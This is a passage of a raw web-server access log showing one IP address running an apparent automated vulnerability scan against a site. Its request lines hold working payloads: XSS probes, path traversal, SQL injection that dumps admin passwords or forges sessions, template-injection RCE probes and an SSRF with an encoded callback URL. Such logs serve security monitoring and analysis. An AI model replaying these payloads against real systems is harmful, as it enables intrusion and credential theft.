/lib/editor/tiny/loader.php?rev=a/../../../../html/pix/f/<input><img%20src=x%20onerror=alert(document.domain)>.png HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.6.25" 154.84.62.234 - - [24/Apr/2025:10:04:19 -0400] "GET /login/index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:10:04:42 -0400] "POST /api/remotefollow HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux i686; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:10:05:30 -0400] "GET /setup/setup-s/%u002e%u002e/%u002e%u002e/log.jsp HTTP/1.1" 403 1242 "-" "-" 154.84.62.234 - - [24/Apr/2025:10:06:25 -0400] "POST /Servlet/Skins HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:06:33 -0400] "GET /2w9rffHGjrMorp83GZb0RQR7yfr.jsp HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.3 
Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:06:37 -0400] "POST /admin/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Fedora; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0" 154.84.62.234 - - [24/Apr/2025:10:06:42 -0400] "GET /admin/dashboard.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:07:04 -0400] "POST /ajax.php?action=save_user HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:10:07:15 -0400] "GET /login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:07:20 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0" 154.84.62.234 - - [24/Apr/2025:10:07:20 -0400] "POST /main/webservices/additional_webservices.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134" 154.84.62.234 - - [24/Apr/2025:10:07:22 -0400] "POST /goform/aspForm HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240" 154.84.62.234 - - [24/Apr/2025:10:07:27 -0400] "GET /cvnnzwm HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0" 154.84.62.234 - - [24/Apr/2025:10:08:38 -0400] "POST /api/v1/snapshots HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0" 154.84.62.234 - - [24/Apr/2025:10:09:04 -0400] "POST /api/runscript HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.7.18" 154.84.62.234 - - [24/Apr/2025:10:09:10 -0400] "GET /_images/AOIW0o HTTP/1.1" 200 0 "-" 
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" 154.84.62.234 - - [24/Apr/2025:10:09:20 -0400] "GET /wp-login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux x86_64; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:10:09:26 -0400] "GET /wp-json/wp/v2/users/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:10:09:31 -0400] "GET /?rest_route=/wp/v2/users HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.6.18" 154.84.62.234 - - [24/Apr/2025:10:09:37 -0400] "GET /feed/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.25" 154.84.62.234 - - [24/Apr/2025:10:09:43 -0400] "GET /author-sitemap.xml HTTP/1.1" 200 119204 "-" "Mozilla/5.0 (CentOS; Linux x86_64; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:10:10:04 -0400] "POST /jeecg-boot/jmreport/show HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:10:23 -0400] "GET /ws/msw/tenant/%27%20union%20select%20%28select%20ID%20from%20SGMSDB.DOMAINS%20limit%201%29%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%27%27%2C%20%28select%20concat%28id%2C%20%27%3A%27%2C%20password%29%20from%20sgmsdb.users%20where%20active%20%3D%20%271%27%20order%20by%20issuperadmin%20desc%20limit%201%20offset%200%29%2C%27%27%2C%20%27%27%2C%20%27 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_7_3; es) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.7 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:10:27 -0400] "GET /appliance/login HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) LoiLoNote/15.0.0 Version/17.3.1 
Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:10:34 -0400] "GET /wp-content/plugins/ultimate-member/readme.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:10:10:38 -0400] "POST /inizio.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.9.17" 154.84.62.234 - - [24/Apr/2025:10:10:43 -0400] "POST /creaprezzi.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:12:58 -0400] "POST /main/webservices/additional_webservices.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:10:13:18 -0400] "GET / HTTP/1.1" 200 0 "-" "python-requests/2.26.0" 154.84.62.234 - - [24/Apr/2025:10:13:19 -0400] "GET /admin?_url=%2Fadmin&date_to='\"><img+src=x+onerror=alert(3)>&date_from='\"><img+src=x+onerror=alert(3)> HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0" 154.84.62.234 - - [24/Apr/2025:10:13:22 -0400] "POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0" 154.84.62.234 - - [24/Apr/2025:10:13:26 -0400] "POST /guestaccess.aspx HTTP/1.1" 200 0 "-" "python-requests/2.26.0" 154.84.62.234 - - [24/Apr/2025:10:13:34 -0400] "POST /moveitisapi/moveitisapi.dll?action=m2 HTTP/1.1" 200 0 "-" "python-requests/2.26.0" 154.84.62.234 - - [24/Apr/2025:10:14:05 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.7.25" 154.84.62.234 - - [24/Apr/2025:10:14:10 -0400] "POST /sitecore_xaml.ashx/-/xaml/Sitecore.Xaml.Tutorials.Styles.Index HTTP/1.1" 200 0 "-" "Mozilla/5.0 
(Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:14:39 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.5.16" 154.84.62.234 - - [24/Apr/2025:10:15:02 -0400] "POST / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:15:27 -0400] "POST / HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.6.21" 154.84.62.234 - - [24/Apr/2025:10:15:48 -0400] "POST /?PHPRC=/dev/fd/0 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:10:16:09 -0400] "POST /webauth_operation.php HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.5.23" 154.84.62.234 - - [24/Apr/2025:10:16:21 -0400] "POST /loadfile.lp?pageid=Configure HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:16:55 -0400] "POST 
/human.aspx?Username=SQL%27%3BINSERT+INTO+activesessions+(SessionID)+values+(%272w9rfaZhkyXHzAInuyGCP8kj6hJ%27);UPDATE+activesessions+SET+Username=(select+Username+from+users+order+by+permission+desc+limit+1)+WHERE+SessionID=%272w9rfaZhkyXHzAInuyGCP8kj6hJ%27;UPDATE+activesessions+SET+LoginName=%27test@test.com%27+WHERE+SessionID=%272w9rfaZhkyXHzAInuyGCP8kj6hJ%27;UPDATE+activesessions+SET+RealName=%27test@test.com%27+WHERE+SessionID=%272w9rfaZhkyXHzAInuyGCP8kj6hJ%27;UPDATE+activesessions+SET+InstId=%271234%27+WHERE+SessionID=%272w9rfaZhkyXHzAInuyGCP8kj6hJ%27;UPDATE+activesessions+SET+IpAddress=%27154.84.62.234%27+WHERE+SessionID=%272w9rfaZhkyXHzAInuyGCP8kj6hJ%27;UPDATE+activesessions+SET+LastTouch=%272099-06-10+09:30:00%27+WHERE+SessionID=%272w9rfaZhkyXHzAInuyGCP8kj6hJ%27;UPDATE+activesessions+SET+DMZInterface=%2710%27+WHERE+SessionID=%272w9rfaZhkyXHzAInuyGCP8kj6hJ%27;UPDATE+activesessions+SET+Timeout=%2760%27+WHERE+SessionID=%272w9rfaZhkyXHzAInuyGCP8kj6hJ%27;UPDATE+activesessions+SET+ResilNode=%2710%27+WHERE+SessionID=%272w9rfaZhkyXHzAInuyGCP8kj6hJ%27;UPDATE+activesessions+SET+AcctReady=%271%27+WHERE+SessionID=%272w9rfaZhkyXHzAInuyGCP8kj6hJ%27%23 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:10:17:12 -0400] "POST /pig/add-pig.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:17:40 -0400] "GET /bin/view/%22%5d%5d%20%7b%7b%61%73%79%6e%63%20%61%73%79%6e%63%3d%22%74%72%75%65%22%20%63%61%63%68%65%64%3d%22%66%61%6c%73%65%22%20%63%6f%6e%74%65%78%74%3d%22%64%6f%63%2e%72%65%66%65%72%65%6e%63%65%22%7d%7d%7b%7b%70%79%74%68%6f%6e%7d%7d%70%72%69%6e%74%28%33%37%32%34%33%34%38%20%2a%20%38%34%37%33%33%33%34%29%7b%7b%2f%70%79%74%68%6f%6e%7d%7d%7b%7b%2f%61%73%79%6e%63%7d%7d?sheet=SkinsCode.XWikiSkinsSheet&xpage=view HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Knoppix; Linux i686) 
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:17:43 -0400] "GET /file-manager/ HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0" 154.84.62.234 - - [24/Apr/2025:10:17:46 -0400] "GET /asyncrenderer/%7B%7Burl%7D%7D?clientId={{id}}&timeout=500&wiki=xwiki HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:17:47 -0400] "POST /file-manager/backend/makefile HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) LoiLoNote/19.0.0 Version/17.1.2 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:17:51 -0400] "POST /file-manager/backend/text HTTP/1.1" 200 0 "-" "Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:17:55 -0400] "POST /file-manager/backend/permissions HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:18:00 -0400] "GET /aR8U2yNHqC.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:18:02 -0400] "GET /api/server/version HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.4 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:18:07 -0400] "POST /api/users HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0" 154.84.62.234 - - [24/Apr/2025:10:18:33 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:19:00 -0400] "POST /superadmincreate.php HTTP/1.1" 403 
1242 "-" "Mozilla/5.0 (Kubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:19:34 -0400] "POST /CFIDE/adminapi/base.cfc?method HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/617.14 (KHTML, like Gecko) Version/17.4.63 Safari/617.14" 154.84.62.234 - fedish264pro [24/Apr/2025:10:20:13 -0400] "GET /b_download/index.html HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3) AppleWebKit/617.2.4 (KHTML, like Gecko) Version/17.3 Safari/617.2.4" 154.84.62.234 - fedish265pro [24/Apr/2025:10:20:13 -0400] "GET /b_download/index.html HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.6) AppleWebKit/616.20 (KHTML, like Gecko) Version/17.1.83 Safari/616.20" 154.84.62.234 - - [24/Apr/2025:10:20:14 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:20:22 -0400] "GET /keepalive.php?caller=%22%3E%3Cimg+src%3d1+onerror%3dalert(document.domain)+%2F%3E&uq_mt=1664137650.085 HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:20:29 -0400] "POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.5.16" 154.84.62.234 - - [24/Apr/2025:10:20:43 -0400] "GET /jeecg-boot/sys/dict/loadTreeData?tableName=sys_user&text=password%20text,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Debian; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0" 154.84.62.234 - - [24/Apr/2025:10:20:43 -0400] "GET /sys/dict/loadTreeData?tableName=sys_user&text=password%20text,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1" 
200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/616.19.3 (KHTML, like Gecko) Version/17.6.11 Safari/616.19.3" 154.84.62.234 - - [24/Apr/2025:10:20:43 -0400] "GET /sys/dict/loadTreeData?tableName=sys_user+t&text=password,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0" 154.84.62.234 - - [24/Apr/2025:10:20:43 -0400] "GET /jeecg-boot/sys/dict/loadTreeData?tableName=sys_user+t&text=password,id&code=password&hasChildField&converIsLeafVal=1&condition&pid=admin&pidField=username HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:21:04 -0400] "GET /userportal/api/rest/contentChannels/?startIndex=0&pageSize=4&sort=TIME&showType=all HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Mobile/15E148 Safari/604.1" 154.84.62.234 - - [24/Apr/2025:10:21:24 -0400] "GET /api/session/properties HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64; rv:127.0) Gecko/20100101 Firefox/127.0" 154.84.62.234 - - [24/Apr/2025:10:21:27 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.9.25" 154.84.62.234 - - [24/Apr/2025:10:21:45 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0" 154.84.62.234 - - [24/Apr/2025:10:22:14 -0400] "GET /login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:22:43 -0400] "GET /login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.4.21" 
154.84.62.234 - - [24/Apr/2025:10:23:27 -0400] "GET /login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:78.0) Gecko/20100101 Firefox/78.0" 154.84.62.234 - - [24/Apr/2025:10:23:34 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:24:14 -0400] "GET /graph_view.php?action=tree_content&node=1-1-tree_anchor&rfilter=%22or+%22%22%3D%22%28%28%22%29%29%3BSELECT+SLEEP%2810%29%3B--+- HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:24:34 -0400] "GET /index.php?m=default&c=user&a=register&u=0 HTTP/1.1" 200 0 "554fcae493e564ee0dc75bdf2ebf94cabought_notes|a:1:{s:2:\"id\";s:49:\"0&&updatexml(1,concat(0x7e,(database()),0x7e),1)#\";}" "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:24:55 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14_3_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:25:34 -0400] "GET /webmail/?color=%22%3E%3Cimg%20src=x%20onerror=confirm(document.cookie)%3E HTTP/1.1" 403 1242 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/616.20.13 (KHTML, like Gecko) Version/17.7.74 Safari/616.20.13" 154.84.62.234 - - [24/Apr/2025:10:26:05 -0400] "POST /modules/miniform/ajax_delete_message.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0" 154.84.62.234 - - [24/Apr/2025:10:26:22 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.4.18" 154.84.62.234 - - [24/Apr/2025:10:26:49 -0400] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 
14.6) AppleWebKit/616.20 (KHTML, like Gecko) Version/17.1.83 Safari/616.20" 154.84.62.234 - - [24/Apr/2025:10:26:58 -0400] "GET /simpleeditor/common/commonReleaseNotes.do HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:10:27:31 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:28:38 -0400] "POST /rest/xxxxxxxxxxxxxxx/xxxxxxx?executeAsync HTTP/1.1" 200 0 "-" "Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:28:49 -0400] "GET /nagiosxi/login.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.6.23" 154.84.62.234 - - [24/Apr/2025:10:30:15 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:30:28 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:30:40 -0400] "GET /admin/store.php?\"onmouseover='alert(document.domain)'bad=\" HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:30:51 -0400] "POST /api/sys/set_passwd HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0" 154.84.62.234 - - [24/Apr/2025:10:31:00 -0400] "GET /lwa/Webpages/LwaClient.aspx?meeturl=aHR0cDovL2QwNHFyN2lqNHBxMTlkNzVrNDkwZXNkcW1pN3dzOWk4cS5vYXN0Lm9ubGluZS8/aWQ9MFNHJTI1ezEzMzcqMTMzN30jLnh4Ly8= HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/79.0.3945.79 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:31:02 -0400] "POST /index.php HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.6.19" 154.84.62.234 - - [24/Apr/2025:10:31:30 -0400] "POST /RealGimmWeb/Pages/Sistema/LogObjectTrace.aspx HTTP/1.1" 200 0 "-" "</span><script>alert(document.domain)</script>" 154.84.62.234 - - [24/Apr/2025:10:31:34 -0400] "GET /RealGimmWeb/Pages/ErroreNonGestito.aspx HTTP/1.1" 200 0 "-" "</span><script>alert(document.domain)</script>" 154.84.62.234 - - [24/Apr/2025:10:31:55 -0400] "POST /main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3 Safari/605.1.15" 154.84.62.234 - - [24/Apr/2025:10:32:03 -0400] "GET / HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:32:05 -0400] "GET /main/inc/lib/javascript/bigupload/files/Hv2hCGm432.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" 154.84.62.234 - - [24/Apr/2025:10:32:05 -0400] "POST /opencms/cmisatom/cmis-online/query HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:32:09 -0400] "GET /WebInterface HTTP/1.1" 200 0 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.1" 154.84.62.234 - - [24/Apr/2025:10:32:09 -0400] "POST /cmisatom/cmis-online/query HTTP/1.1" 200 0 "https://mgrokokbet.id" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36" 154.84.62.234 - - [24/Apr/2025:10:32:20 -0400] "GET / HTTP/1.1" 200 
